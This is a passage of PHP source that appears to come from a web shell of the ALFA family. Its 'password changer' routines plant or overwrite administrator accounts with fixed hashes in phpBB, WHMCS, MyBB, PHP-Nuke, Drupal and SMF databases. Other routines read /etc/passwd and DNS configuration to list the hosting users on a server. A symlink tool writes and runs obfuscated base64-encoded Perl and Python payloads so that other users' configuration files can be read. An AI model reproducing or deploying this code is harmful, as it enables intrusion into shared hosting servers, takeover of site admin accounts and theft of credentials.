  4355. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4356. 'td4' =>
  4357. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4358. 'td5' =>
  4359. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4360. 'td6' =>
  4361. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4362. 'td7' =>
  4363. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4364. 'td8' =>
  4365. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4366. );
  4367. create_table($table);
  4368. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4369. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4370. $localhost = $_POST['alfa2'];
  4371. $database = $_POST['alfa3'];
  4372. $username = $_POST['alfa4'];
  4373. $password = $_POST['alfa6'];
  4374. $admin = $_POST['alfa8'];
  4375. $SQL = $_POST['alfa9'];
  4376. $prefix = $_POST['alfa10'];
  4377. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4378. $hash = md5('solevisible');
  4379. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4380. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4381. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
  4382. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
  4383. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4384. if($solevisible){
  4385. __alert('Success... '.$admin.' is created...');
  4386. }
  4387. }
  4388. }
  4389. if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
  4390. echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
  4391. $table = array('td1' =>
  4392. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4393. 'td2' =>
  4394. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4395. 'td3' =>
  4396. array('color' => 'FFFFFF', 'tdName' => 'DbUser', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4397. 'td4' =>
  4398. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4399. 'td6' =>
  4400. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4401. 'td7' =>
  4402. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4403. 'td8' =>
  4404. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4405. );
  4406. create_table($table);
  4407. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4408. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4409. $localhost = $_POST['alfa2'];
  4410. $database = $_POST['alfa3'];
  4411. $username = $_POST['alfa4'];
  4412. $password = $_POST['alfa5'];
  4413. $admin = $_POST['alfa8'];
  4414. $SQL = $_POST['alfa9'];
  4415. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4416. $solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
  4417. if($solevisible){
  4418. __alert('Success... '.$admin.' is created...');}
  4419. }
  4420. }
  4421. if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
  4422. echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  4423. $table = array('td1' =>
  4424. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4425. 'td2' =>
  4426. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4427. 'td3' =>
  4428. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4429. 'td4' =>
  4430. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4431. 'td5' =>
  4432. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4433. 'td6' =>
  4434. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4435. 'td7' =>
  4436. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4437. 'td8' =>
  4438. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4439. );
  4440. create_table($table);
  4441. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4442. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4443. $localhost = $_POST['alfa2'];
  4444. $database = $_POST['alfa3'];
  4445. $username = $_POST['alfa4'];
  4446. $password = $_POST['alfa5'];
  4447. $admin = $_POST['alfa8'];
  4448. $SQL = $_POST['alfa9'];
  4449. $prefix = $_POST['alfa10'];
  4450. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4451. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
  4452. if($solevisible){
  4453. __alert('Success... '.$admin.' is created...');}
  4454. }
  4455. }
  4456. if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
  4457. echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
  4458. $table = array('td1' =>
  4459. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4460. 'td2' =>
  4461. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4462. 'td3' =>
  4463. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4464. 'td4' =>
  4465. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4466. 'td5' =>
  4467. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4468. 'td6' =>
  4469. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4470. 'td7' =>
  4471. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4472. 'td8' =>
  4473. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4474. );
  4475. create_table($table);
  4476. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4477. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4478. $localhost = $_POST['alfa2'];
  4479. $database = $_POST['alfa3'];
  4480. $username = $_POST['alfa4'];
  4481. $password = $_POST['alfa5'];
  4482. $admin = $_POST['alfa7'];
  4483. $SQL = $_POST['alfa9'];
  4484. $prefix = $_POST['alfa10'];
  4485. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4486. $hash = md5($pwd);
  4487. $solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  4488. if($solevisible){
  4489. __alert('Success... '.$admin.' is created...');}
  4490. }
  4491. }
  4492. if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
  4493. echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
  4494. $table = array('td1' =>
  4495. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4496. 'td2' =>
  4497. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4498. 'td3' =>
  4499. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4500. 'td4' =>
  4501. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4502. 'td6' =>
  4503. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4504. 'td7' =>
  4505. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
  4506. );
  4507. create_table($table);
  4508. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4509. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4510. $localhost = $_POST['alfa2'];
  4511. $database = $_POST['alfa4'];
  4512. $username = $_POST['alfa5'];
  4513. $password = $_POST['alfa6'];
  4514. $admin = $_POST['alfa8'];
  4515. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4516. $getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
  4517. $getDescuid = @mysqli_fetch_assoc($getDescuid);
  4518. $getDescuid = $getDescuid['uid'];
  4519. $getdescuid = $getDescuid++;
  4520. $solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4521. $solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
  4522. $sole = mysqli_num_rows($solevisible);
  4523. if ($sole == 1){
  4524. $solevis = mysqli_fetch_assoc($solevisible);
  4525. $res = $solevis['uid'];
  4526. }
  4527. $solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
  4528. if($solevisible){
  4529. __alert('Success... '.$admin.' is created...');}
  4530. }
  4531. }
  4532. if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
  4533. echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
  4534. $table = array('td1' =>
  4535. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4536. 'td2' =>
  4537. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4538. 'td3' =>
  4539. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4540. 'td4' =>
  4541. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4542. 'td5' =>
  4543. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
  4544. 'td6' =>
  4545. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4546. 'td7' =>
  4547. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4548. );
  4549. create_table($table);
  4550. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4551. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4552. $localhost = $_POST['alfa2'];
  4553. $database = $_POST['alfa3'];
  4554. $username = $_POST['alfa5'];
  4555. $password = $_POST['alfa6'];
  4556. $prefix = $_POST['alfa7'];
  4557. $admin = $_POST['alfa8'];
  4558. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4559. $setpwAlg = sha1(strtolower($admin) . 'solevisible');
  4560. $solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4561. if($solevisible){
  4562. __alert('Success... '.$admin.' is created...');}
  4563. }
  4564. }
  4565. echo "</div>";
  4566. alfafooter();
  4567. }
  4568. function alfaMakePwd(){
  4569. if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
  4570. return "/home/{user}/public_html/";
  4571. }
  4572. $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
  4573. $public = end($document);
  4574. array_pop($document);
  4575. array_pop($document);
  4576. $path = implode("/", $document) . "/{user}/" . $public;
  4577. return $path;
  4578. }
  4579. function alfaGetDomains($state = false){
  4580. $state = "named.conf";
  4581. $lines = array();
  4582. $lines = _alfa_file('/etc/named.conf');
  4583. if(!$lines){
  4584. $lines = @scandir("/etc/valiases/");
  4585. $state = "valiases";
  4586. if(!$lines){
  4587. $lines = @scandir("/var/named");
  4588. $state = "named";
  4589. if(!$lines && $state){
  4590. $lines = _alfa_file('/etc/passwd');
  4591. $state = "passwd";
  4592. }
  4593. }
  4594. }
  4595. return array("lines" => $lines, "state" => $state);
  4596. }
  4597. function alfasymlink(){
  4598. alfahead();
  4599. AlfaNum(9,10);
  4600. echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
  4601. if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
  4602. $sympath = alfaMakePwd();
  4603. @mkdir('cgialfa',0755);
  4604. @chdir('cgialfa');
  4605. alfacgihtaccess('cgi');
  4606. $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/50YC1PaSPivbFOuSVrJg2q1BFDOas+Ztt5U25sb8ZhNdoHUkOSyC0KR/vb79pEYFW3nMmPYzX7v9zpjFEVZyjhOOTo5Gx6+P0HdHqKLmHGGGkefvq7M9/3zo7/6fw9PPp0ffT7uHx6Z62C6RI15y0ddZBhqE6p1PEKWomOjVV7EQNY4zFJOU97ky5y2EacL7k74NBmkg7QjFr3OhGLS6/CYJ7R3mBFKULhE/Q/HfXRO+x87rjrpML6EH7wSJJqERlmBeZyl7TRLabDuuOq84ypyYUaWKBxHWZIVXfO5Jx+zZwRKLLND4jmSKF0jx4TE6bjte/kiCKa4GMdpM8w4z6bqW5gVhBZtP18ggtkEJHw+kk8g6bdhJ8gHUjScxOO0HYHOtAhGoH3zmsbjCW+HWULUBxZ/p+3WG6Bs3GrMsoQihgl6geJ0HrM4hP0PdLacJnF6hX5foj9pkXRcELxnBmuaMLrSbmj0P7//euFdBtoT0TjGyQi7RrBmsxDIDXFR4CVagbMswPG2GnPfswH0YCgc+NvcH8FminO0agxFDPhrdCAAg4LyWZEiSwUFIPujlUBe2/a+3/YUg/yalLTfaKrxyHqmQ2GlaQhhgzUcABSi/yKDxAWNuFEBGO4km1J3NWO0WLv5LEziaChiRCgCeE0KIJRHboqnlDgQuiMDvXiBmkR/n4PtMaPM/UWaByxPYg4Cy1/LHbjulop7493p4ZePR5/Oh59PT8+Nta3ifBdg8yxHCjGoLTW7b1mcWoZrbOnvtgMSaOYGcoCCstgUX1FelEbbBq5zKl7+nnjvaCPqFOoApApV82GEmZA6EO8irlAZ7cfweD5EOzDcdoyOK04hNQQgJxtoJXTEBSWMJgUddU3DAamodNLFvnguDbSPzG94jllUxDlv44QW3DKuoYKI6jGKU4JINsVx6jiOYZttZE44z9uua4IQ1HYME3HILMq75jBMcHpl3hPa8/qtlqeEpjWhcSX4Bi2PjxWCv/dAzbo2kBeOIVKCqWxyxTqHdHL4govjHcdwfyYg2FTWEJ2RDwR0edHTGUeyIXC6nxMyhPzXIoauifwuPh3M/R34ZOlNVFu/rtaNOYG1r0nA0lPLt7dL73bpK4haqsmMgaxQx4KH/hRkOYX0Jp5wHdtC5r0EM22UFRVOmWBGoKXuaMReECUZtBO9VawBR/CukEr2QmjzbsKaUg4oCEg1l9aWAlS8d6XummVBRbkuJNSdc8Vz9y6XOS6UNk9z8H/CwS85PBMbe6WcAOUMHqjEm4raRsPO44LPcOKqVMmuU1qwysR3hHjasr7Wcq/m9JpZNZcndd7T3KKNGu/dmnSv1EXa8fEQIVIWRbAjj0vZ5aZqWZ62nN6+1dtKsSp+BVcrx4xdV1zV7hGLqcNeIFwBwaq2RnBLWddTXQTQUVFkhShXWrSq3GLRelXT75q+WRbMEEdX4yKbpaSp+74aK/TI0PYQnvFMVmQ90/zPuv3yQSnbWCnfySBiTwOXVfIL9KCfgm4ucGVxg5fWS0xXUOsaC2n/UQbxE01kkAEiRZbwiL2KoPXmOjjFXCIP9R7XpkeflOPjg3qlMw6CQhLu/kBT13m5/x1mPmRYsLINtHKDkoGvPWnVOdoCjbkOCV13XAVaKPkAixRcc2csUbzRzQ0qv9QqWB3Z0UDl1qmoKbVkFN4bTESvCgM1zAgQGe7CGNB48utZTCwL5nFuyTP7YvvS1iopwmqtuga9HVzaYm6RugaaHPxQNREqQ4itf6lM/FYyFXtlmX8G7NUN/DWEfer4vsQXdDYDhjVGdQvqzCutRS9al6iDdjyvtI/GrYYL1e52a5PYWs1i0C6lSqTktHMJnVpYcVdIVzoTb3SmiJFKFOuWymsdEXouE/giMCQWEQPlPT2Ul72ysWzL4lQPeih5EPLRnYhv1QIc1+KbaKtEjwWzcE5LBbOlUBu+Fnjg3AyatSD2Kth5VAGDHPehJXALgGXDGSZQzLsI3mM+kdazUVPNFtXIARgwxzBeyPMt5IEvKmRbGKc6fnAqFSzvHNYAaEpHYgf0qBJEzr9WYyGOVFvC8k3A3YtXrwJtZz/IZ2xi1WiAHqLr6sKwDU65JVXF0waCOnUeEw0CcrNwfriB2AOhABs4lA3EVQUSfkUnEUPhenoF/dWqz6AgpLe7s6PHO1/Gy3N1G4S73pm4DZ7J2+BJeRscpKe5uPIy+ETogjJ0nCVJdg31+gMQZIP0nRw+smIpAeSVUuM6OVx6BmmfkHO4iKt7eJ5A+0D5JBd/20hAJAheSF3QAfYPnBIY9H8BXEf6SM2TsABv9EDFO1O3M+E4iihj5TUcwne0ltrrSUFQ0NDqGvX41C6D9Fl1J9w0WUHaq0ncKhuKLqbl13JYkylSXlcrL2onyv9SgA//A3Qr5vcvEQAA")));';
  4607. $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("eJydWG1v2zYQ/mz/ClZFZntxJDvY9sFxPGRpshXo2mHNMAyJIdAibWuRRYGkY3tF99t3xxdJtpW0mD5YFHnvvHt4tJa7UbuVrgohNUkWqZ61W+YV8pzOMt7ttfk24YUGqoIq1W47Wp2uuB8L5UdqVw5luVxsWLu9yMSMZjGMySUJAv+9lpn9fvsxvv75LYxvaaY4qJmDWDDiKZUiD5dUxY981w1+vrq7+fPqr/jt+7ub32+vrm+CHlhWMt/JNW9zEACTexrBsJDKxdP9cFquON3gLs3mNArabcbnZME18nQLoVA02OGlO9tgsiW5XsucVCoMIbAgVcBSyRMdECFJF5woqF6GqZqnEM4g4jqJcrriLExEPg96hOaMVFTA64ieaJZSxVUU9Ho1nUG0FCsefVorLj9HxXqWpUm81KsMHGgBN5hQi9x98ObD9R+/3ry/i3//8OEumIaqyFINKoIe7KjhBgbkCwtRwHa36mOv80R5hScqICcE+cO/RZp3kbrXJ1ZSz4ZwRR+5lt1ErHPdJ0ysaJr3CfL3SbJh6M1S6wKDj+9RFAWnChgsZc/E0o5NOO9/xGcaYBAcX+dv+kRVIlNITJpxCQ5tOElorsk8hXha7jAMg14H3JQpLARjLYnSu4xfdjTf6jOI7yIfJTzXXF50JmPNJuO5AMpEZEJedl7fwjMYdibWOuNO7zQYR0g0GUdIr1mDyIzPNQqkZCn5/LJj+dF0YO8QDYnI9WUnnmU0f+wcKB0Mrs7PB16pC0lNKy01N1h7e+sZMdrHxh7aVFUC0GIVqN0qS/PHCMfFzn2FeqtdDGD3ToPoSz5A2ODpTD5a/iPbIy0nkK0mWZiInRpfcqudK9p6KQIs0TyWnLLYVI8v9laqYsh0vaZZOfVEZUlk4aRl4yg2OTcF4ma5lFCj5afnuQeMAIO4cmM2QzeTxyxV2k3Vqt1wmeTcM8XJPDbbL2gDva1Skyh43oAPITIbGizIlkVjcmNeqciNCC+qkqVCNLYRTJCwUUolplkOhNVaZmW09uJsI/+s6DLUlo5nx3A5ejkmLrJRfSePonO4z86ql4PmXTgOmlP5Uswa97weylL6V23vs/F7No0OIgtxNRPIdpDeLRNwEuA5vmHBRevlgDuyr0rA521w2OtKnNzgPOIy5oA9S0t0xn6DzIRkHDBk2PHAOoPKW0gAX3Zm8GX0emCeixVgUJqPBoSutTAAvgRLJ/8b5r89AstGYH5jUky9TOzB+A+A4S+SNoOlB0r4cX7NBNshbra2EOohvOcQdNwZAiel2aFyL4EAXyGAdlrYzKKMSa6UW8EZUyaYEfev8Jmi6BZAfKz5qrBtGWZ4E9SZ6Vr913ojeBSnMlmCBAkWmHG3E3774z8CDAu6MOoF5FOnbwxxWALiLKUTUTPXzoeYA0V36Oh5pa0FlaTT3ONPtVCJcCNI5QKAHNqwkM2CPjhopWFrho6gz/twadsdx+79PujpPHfPqa1qv4wwnGIhnGbFZp0ybAmVprrig88YFnphsTHxdB42A8Gz3tbnq2lGNS2TwbZ+I+c1eAIGdJGiR8bkvEFO6QAS3Q+m7f2wmtnh1Eurg68Ttsc/nNbz8UjQYH+5lncOikZlqgBiGLvvz6do+veDQWN0ahrKLtIulJ2vbTZ8aD5H/myrl8GJzwOr8/up73fBI0deK5RXhwbXRDltZRraphoy0cTJynKiDgAfbwkH4cD7RXX8jFwm52z/eDAgYZIbQMLIqh1MQIiv/W3JYwxbWf8N1vhg5/HXVrrJc8cF4jyjF1Tp9CsH5e64DFGqyHuQX/Ie7Dmmx0FU6vLL+pKVShxUm3IW9ANz7HmsMN+1fI6hbLCmoHjsvpEzA8fwHPaJHjGQ7H4wKtmnuJHWgr1pby+b2cSDvDuxSvrOzloUgQj2tFRZBmQ/Hi13Hdt6CS7bzF3MJKYXuSWnl96RKpPKzq7mXUgLaBRYl83KWvX0+ydBpbsswOfUV9pr6NUQBlfTpWIbhXqP3gRklSGO/xkzajGoi9x32LcskT2S4Y29CxzNcKcBi2JTJXFsijWOERTjGMGg9ndCrfO5BjuhOznTu4KPCPYsEd7nH/KHfIyDydid/6kGJdcCwzzbkat3t1fkjl/9CurNyth0PRP6ybQ9jCdCUnNw5FAtF5/HkV0fR1Ycmk5mi6q9sW1IUBrWGbP0ybVSgDmMpfliNBwU2wvXep3NhNZiZeds4zYaFltAc7UEG1/PzXPhurb53HRtxz0Z9jtnG54ulno0ExmzEyr9h4/OfwDJQeWzEtAiKsrIN7DnT6lKsWX8l7jWify0I7/t9FLk4whMn8DV353FeOTuFOxyN5ArcibnpHbZNbUNFJgi+HdGt1Nb7LjFZIn3goMVL9leX4MIW4rjm7OhW2qaJO4oem39AWs/oj8fjT9vvT8P+Qdz3iuYYnwLbfmtyDKxASffgUj1kL8xFyYhd4bABMXxhgUkzEN+xdgdJJPNJUAxqI9iWRBMJvzBj+9IYZMMaH+BwyWDY/rL5Jgcq/KaEHqnACA3pyaMq3AjU827fsXOJZlQ+Fdiu6l9eul6tw8ntb8KguoiypuW3Z0S1g/bqD7eTer3DpuFUD0Fzf3Fwaas5AwuDCfQv+MaFI4jxVYAhPwHJ4ZsdA==")),\'<string>\',\'exec\'))';
  4608. $cginame = "symperl.alfa";
  4609. $source = $perl;
  4610. $lang = "perl";
  4611. if($_POST["alfa2"]=="sympy"){
  4612. $cginame = "pysymlink.alfa";
  4613. $source = $py;
  4614. $lang = "python";
  4615. }
  4616. @__write_file($cginame,$source);
  4617. @chmod($cginame,0755);
  4618. echo __pre();
  4619. $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
  4620. if(strlen($resource) == 0){
  4621. echo AlfaiFrameCreator('cgialfa/'.$cginame);
  4622. }else{
  4623. echo $resource;
  4624. }
  4625. }
  4626. if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
  4627. if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
  4628. AlfaNum(9,10);
  4629. echo __pre().'
  4630. <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
  4631. <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
  4632. <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
  4633. <p><input type="submit" value=" " name="symlink" /></p></form></center>';
  4634. $path = $_POST['alfa5'];
  4635. $symname = $_POST['alfa6'];
  4636. $solevisible58 = $_POST['alfa7'];
  4637. if($solevisible58){
  4638. $new_name = str_replace(".", "_", basename($symname));
  4639. $rand_dir = $new_name.rand(111,9999);
  4640. $sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
  4641. @mkdir($sym_dir, 0777, true);
  4642. alfacgihtaccess('sym', $sym_dir, $symname);
  4643. _alfa_symlink("$path","$sym_dir/$symname");
  4644. echo __pre();
  4645. echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
  4646. }
  4647. }else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
  4648. }
  4649. if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
  4650. $cant_symlink = true;
